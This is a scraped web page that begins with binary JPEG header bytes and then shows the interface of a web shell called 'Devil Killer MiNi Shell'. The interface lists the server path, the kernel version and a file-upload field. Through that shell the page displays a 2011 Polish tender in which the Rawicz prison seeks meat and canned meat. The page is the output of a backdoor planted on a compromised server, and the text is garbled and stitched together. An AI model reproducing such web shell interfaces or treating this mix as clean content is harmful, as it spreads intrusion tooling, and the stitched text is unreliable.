JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110322/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110322/91547-N-2011.html

<p class="kh_header"><b>Rawicz: Sukcesywne dostawy mięsa, podrobów, wędlin i konserw.</b><br>
<b>Numer ogłoszenia: 91547 - 2011; data zamieszczenia: 22.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Rawiczu , ul. 17 Stycznia 28, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5468500, 5468551,53,56, faks 065 5454266.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy mięsa, podrobów, wędlin i konserw..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:
sukcesywne dostawy mięsa, podrobów, wędlin i konserw.

Zamawiający podzielił przedmiot zamówienia na cztery części (zadania):
-zadanie nr 1: Sukcesywne dostawy mięsa i wędlin z indyka,
-zadanie nr 2: Sukcesywne dostawy mięsa i podrobów z kurczaka,
-zadanie nr 3: Sukcesywne dostawy mięsa, podrobów i wędlin wieprzowych oraz wołowych,
-zadanie nr 4: Sukcesywne dostawy konserw mięsnych,

Wykonawca może złożyć ofertę na dowolną ilość zadań.

Zadanie nr 1: Sukcesywne dostawy mięsa i wędlin z indyka. 

1.mięso klopsowe z indyka -	Produkt mięsny, średnio rozdrobniony, niepodany obróbce termicznej, świeże, PN-A-82011- 1700 kg,
2.mięso gulaszowe z indyka  klasa II -	Mięso z indyka świeże lub mrożone, 
PN-A-86524 -1600 kg,
3.filet z indyka -Mięso z indyka, elementy świeże lub mrożone,PN-A-86524 -1200 kg, 
4.skrzydło środkowe z indyka -Mięso z indyka elementy świeże lub mrożone, 
PN-A-86524 -2000 kg,
5. mortadela z indyka popularna -Kiełbasa drobiowa, homogenizowana, parzona, PN-A-86526 -1200 kg,
6.mortadela śniadaniowa z indyka -Kiełbasa drobiowa, homogenizowana, parzona, PN-A-86526 -1200kg,
7.mortadela z pieczarkami -	Kiełbasa drobiowa, homogenizowana, parzona, PN-A-86526 -	1600kg,
8.mortadela czosnkowa z indyka -Kiełbasa drobiowa, homogenizowana, parzona, PN-A-86526 -2000kg,
9.parówka z indyka	Kiełbasa drobiowa, homogenizowana, wędzona,  parzona, PN-A-86526 -	1700 kg,
10.kiełbasa śniadaniowa z indyka -Kiełbasa drobiowa, homogenizowana, parzona, PN-A-86526 -1900kg,
11.kiełbasa litewska z indyka	Kiełbasa drobiowa średnio rozdrobniona, parzona, 
PN-A-86526 -2200kg,
12.szynka tyrolska z indyka -Wyrób blokowy średnio rozdrobniony, parzony, 
PN-A-86526 -1100 kg,
13.szynka Gerwazego z indyka -Wyrób blokowy grubo rozdrobniony, parzony,
PN-A-86526 -900kg,
14.szynka mielona blok z indyka -Wyrób blokowy średnio rozdrobniony, parzony, 
PN-A-86526 -2500kg,
15.polędwica firmowa z indyka -Kiełbasa drobiowa, parzona, PN-A-86526 - 1100kg,
16.pieczeń drobiowa z indyka -Pieczeń drobiowa, średnio rozdrobniona, 
PN-A-86526 -1800kg,
17.pasztet firmowy z indyka	Wędlina podrobowa, parzona, 
PN-A-86526 -1600kg,
18.kiełbasa krakowska parzona -Wędlina parzona, podsuszana, grubo rozdrobniona, PN-A-82007 -800kg,
19.szynka gotowana biała-Wyrób blokowy średnio rozdrobniony, parzona, 
PN-A-82007-850kg,
20.kiełbasa szynkowa drobiowa-Kiełbasa drobiowa średnio rozdrobniona, parzona,
 PN-A-82007-600kg,
21.serdelki drobiowe-Wędlina drobiowa homogenizowana, drobno rozdrobniona, parzona, PN-A-86526-3400kg,
22.salceson z indyka-Wędlina drobiowa podrobowa, parzona, PN-A-86526-1500kg,

Zadanie nr 2: Sukcesywne dostawy mięsa i podrobów z kurczaka. 

1.kurczak cały-Mięso z kurczaka-cały, mrożony, PN-A-86520-3200kg,
2.skrzydełka z kurczaka -Mięso kurczak - elementy mrożone, PN-A-86524-500kg,
3.udko z kurczaka-	Mięso kurczak - elementy mrożone, PN-A-86524-1400kg,
4.filet z kurczaka-	Mięso kurczak - elementy świeże lub mrożone, 
PN-A-86524-1200kg,
5.mięso gulaszowe z kurczaka-Mięso kurczak - świeże lub mrożone,
PN-A-86524-800kg,
6.żołądki z kurczaka -Podroby - żołądki z kurczaka świeże lub mrożone,
PN-A-86523-600kg,
7.serca z kurczaka	Podroby - serca z kurczaka świeże lub mrożone,
PN-A-86523-600kg,
8.wątróbki z kurczaka-Podroby - wątroba z kurczaka świeża lub mrożona, 
PN-A-86523-1900kg,

Zadanie nr 3: Sukcesywne dostawy mięsa, podrobów i wędlin wieprzowych oraz wołowych. 

1.mięso wieprzowe -  szynka surowa D 4-Mięso wieprzowe, elementy świeże, PN-86/A-82002-2700kg,
2.mięso wieprzowe klopsowe	Produkt mięsny, średnio rozdrobniony, niepodany obróbce termicznej, stosunek mięsa do tłuszczu 80/20, PN-A-82011-1800kg,
3.mięso wieprzowe łopatka bez kości	Mięso wieprzowe, elementy świeże, PN-86/A-82002-3400kg,
4.mięso wieprzowe gulaszowe-Produkt mięsny, średnio rozdrobniony, niepodany obróbce termicznej, stosunek mięsa do tłuszczu 50/50, PN-A-82011-4000kg,
5.mięso wieprzowe schab bez kości-Mięso wieprzowe, elementy świeże, PN-86/A-82002-900kg,
6.boczek wędzony bez kości płaty-Mięso wieprzowe, elementy świeże, wędzone, PN-A-82007-1200kg,
7.wędzonka bigosowa bez kości-Mięso wieprzowe, elementy świeże, wędzone, PN-A-82007-	1800kg,
8.słonina płaty-Świeża, PN-86/A-82002-1200kg,
9.mięso wołowe bez kości ekstra-Mięso wołowe elementy świeże, 
PN-88/A-82003-900kg,
10.mięso wołowe antrykot-Mięso wołowe elementy świeże, PN-88/A-82003-500kg,
11.mięso wołowe z kością - żebra-Mięso wołowe elementy świeże,
PN-88/A-82003-900kg,
12.żołądki wieprzowe-Podroby świeże, PN-86/A-82004-2000kg,
13.ozory wieprzowe-Podroby świeże, PN-86/A-82004-1400kg,
14.serca wieprzowe-Podroby świeże, PN-86/A-82004-2300kg,
15.wątroba wieprzowa-Podroby świeże, PN-86/A-82004-	3000kg,
16.kiełbasa zwyczajna-Wędlina średnio rozdrobniona, PN-A-82007-3200kg,
17.kiełbasa parówkowa-Wędlina homogenizowana, drobno rozdrobniona , parzona, 
PN-A-82007-2800kg,
18.kiełbasa biała parzona-Wędlina parzona, średnio rozdrobniona,
PN-A-82007-2700kg,
19.kiełbasa mortadela-Wędlina homogenizowana, drobno rozdrobniona, parzona, 
PN-A-82007-2100kg,
20.Kiełbasa golonkowa parzona-Wędlina parzona, grubo rozdrobniona,
PN-A-82007-700kg,
21.kiełbasa mielonka-Wędlina parzona, średnio rozdrobniona, PN-A-82007-2300kg,
22.Kiełbasa słoikowa-Wędlina parzona, średnio rozdrobniona, PN-A-82007-1500kg,
23.kiełbasa szynkowa mielona wieprzowa-Wędlina drobno rozdrobniona, parzona, PN-A-82007-1500kg,
24.serdelki śląskie-	Wędlina drobno rozdrobniona, parzona, PN-A-82007-1200kg,
25.pieczeń wielkopolska-Wyrób średnio rozdrobniony, zapiekany, 
PN-A-82007-2100kg,
26.wątrobianka-Wędlina podrobowa, parzona,PN-A-82007-2800kg,
27.metka cebulowa-Wędlina drobno rozdrobniona,PN-A-82007-2400kg,
28.salceson czarny	Wędlina podrobowa, parzona,PN-A-82007-1500kg,
29.kaszanka-Wędlina podrobowa , parzona, PN-A-82007-	4300kg,

Zadanie nr 4: Sukcesywne dostawy konserw mięsnych. 

1.konserwa pasztet z indykiem -Zawartość mięsa z indyka min. 10%; Opakowanie jednostkowe o pojemności około 300 g; z samootwieraczem-1300kg,
2.konserwa pasztet z gęsią	Zawartość mięsa z gęsi min. 10%; Opakowanie jednostkowe o pojemności około 300 g; z samootwieraczem-1500kg,
3.konserwa wołowa-Skład; mięso wołowe min. 69%; Opakowanie jednostkowe o pojemności około 300 g; z samootwieraczem-1000kg,
4.konserwa mięsna wieprzowa-typu tyrolska lub produkt równoważny; opakowanie jednostkowe o pojemności około 300g ; z samootwieraczem-1000kg,
5.konserwa mięsna wieprzowa-typu tyrolska lub produkt równoważny; opakowanie jednostkowe o pojemności od 100-140g ; AluPack; z samootwieraczem-300kg,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.00.00-2, 15.13.11.30-5, 15.11.21.20-3, 15.11.20.00-6, 15.11.10.00-9, 15.11.30.00-3, 15.13.10.00-5, 15.13.13.10-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia przez Wykonawców wadium.
Ustala się wadium dla całości zamówienia w wysokości: 13.000,00 zł, słownie: trzynaście tysięcy złotych 00/100. 

Dla zadania nr 1: w wysokości: 5.000,00 zł, słownie: pięć tysięcy złotych 00/100.
Dla zadania nr 2: w wysokości: 1.500,00 zł, słownie: tysiąc pięćset złotych 00/100.
Dla zadania nr 3: w wysokości: 6.000,00 zł, słownie: sześć tysięcy złotych 00/100.
Dla zadania nr 4: w wysokości: 500,00 zł, słownie: pięćset złotych 00/100.

Wykonawca wnosi wadium:
  1) w pieniądzu przelewem na konto zamawiającego: 
NBP o/Poznań numer konta 28 1010 1469 0035 8013 9120 0000 
 lub w jednej z poniżej podanych form:
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
3) w gwarancjach bankowych,
4) w gwarancjach ubezpieczeniowych 
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824), sposób przekazania:
Dokumenty wymienione w pkt 2, 3, 4, 5 należy złożyć w siedzibie zamawiającego (w dziale finansowym ) przed upływem terminu składania ofert. 
Wadium wniesione w pieniądzu (pkt.1) musi być dostępne na koncie zamawiającego w przeddzień otwarcia ofert, czyli 31.03.2011 roku.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku o oświadczenie, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku o oświadczenie, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku o oświadczenie, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku o oświadczenie, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku o oświadczenie, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/ nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Rawiczu, ul. 17-go Stycznia 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.04.2011 godzina 09:00, miejsce: Zakład Karny w Rawiczu, ul. 17-go Stycznia 28, w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywne dostawy mięsa i wędlin z indyka..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1: Sukcesywne dostawy mięsa i wędlin z indyka. 

1.mięso klopsowe z indyka-Produkt mięsny, średnio rozdrobniony, niepodany obróbce termicznej, świeże, PN-A-82011-1700kg,
2.mięso gulaszowe z indyka  klasa II-Mięso z indyka świeże lub mrożone, PN-A-86524-1600kg,
3.filet z indyka-Mięso z indyka, elementy świeże lub mrożone, 
PN-A-86524-1200kg,
4.skrzydło środkowe z indyka-Mięso z indyka elementy świeże lub mrożone, 
PN-A-86524-2000kg,
5.mortadela z indyka popularna-Kiełbasa drobiowa, homogenizowana, parzona, PN-A-86526-	1200kg,
6.mortadela śniadaniowa z indyka-Kiełbasa drobiowa, homogenizowana, parzona, PN-A-86526-1200kg,
7.mortadela z pieczarkami-Kiełbasa drobiowa, homogenizowana, parzona, PN-A-86526-1600kg,
8.mortadela czosnkowa z indyka-Kiełbasa drobiowa, homogenizowana, parzona, PN-A-86526-	2000kg,
9.parówka z indyka	Kiełbasa drobiowa, homogenizowana, wędzona,  parzona, PN-A-86526-1700kg,
10.kiełbasa śniadaniowa z indyka-Kiełbasa drobiowa, homogenizowana, parzona, PN-A-86526-	1900kg,
11.kiełbasa litewska z indyka	Kiełbasa drobiowa średnio rozdrobniona, parzona, 
PN-A-86526-2200kg,
12.szynka tyrolska z indyka-	Wyrób blokowy średnio rozdrobniony, parzony, 
PN-A-86526-1100kg,
13.szynka Gerwazego z indyka-Wyrób blokowy grubo rozdrobniony, parzony,
PN-A-86526-900kg,
14.szynka mielona blok z indyka-Wyrób blokowy średnio rozdrobniony, parzony, 
PN-A-86526-2500kg,
15.polędwica firmowa z indyka-Kiełbasa drobiowa, parzona, PN-A-86526-1100kg,
16.pieczeń drobiowa z indyka-Pieczeń drobiowa, średnio rozdrobniona,
 PN-A-86526-1800kg,
17.pasztet firmowy z indyka	Wędlina podrobowa, parzona, PN-A-86526-1600kg,
18.kiełbasa krakowska parzona-Wędlina parzona, podsuszana, grubo rozdrobniona, PN-A-82007-800kg,
19.szynka gotowana biała-Wyrób blokowy średnio rozdrobniony, parzona, 
PN-A-82007-850kg,
20.kiełbasa szynkowa drobiowa-Kiełbasa drobiowa średnio rozdrobniona, parzona,
 PN-A-82007-600kg,
21.serdelki drobiowe-Wędlina drobiowa homogenizowana, drobno rozdrobniona, parzona,-PN-A-86526-3400kg,
22.salceson z indyka-Wędlina drobiowa podrobowa, parzona, 
PN-A-86526-1500kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.00.00-2, 15.13.11.30-5, 15.11.21.20-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywne dostawy mięsa i podrobów z kurczaka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2: Sukcesywne dostawy mięsa i podrobów z kurczaka. 

1.kurczak cały-Mięso z kurczaka-cały, mrożony, PN-A-86520-3200kg,
2.skrzydełka z kurczaka -	Mięso kurczak - elementy mrożone, 
PN-A-86524-500kg,
3.udko z kurczaka-	Mięso kurczak - elementy mrożone, PN-A-86524-1400kg,
4.filet z kurczaka-	Mięso kurczak - elementy świeże lub mrożone,
 PN-A-86524-1200kg,
5.mięso gulaszowe z kurczaka-Mięso kurczak - świeże lub mrożone, 
PN-A-86524-800kg,
6.żołądki z kurczaka-Podroby - żołądki z kurczaka świeże lub mrożone, 
PN-A-86523-600kg,
7.serca z kurczaka	Podroby - serca z kurczaka świeże lub mrożone, 
PN-A-86523-600kg,
8.wątróbki z kurczaka-Podroby - wątroba z kurczaka świeża lub mrożona, PN-A-86523-	1900kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
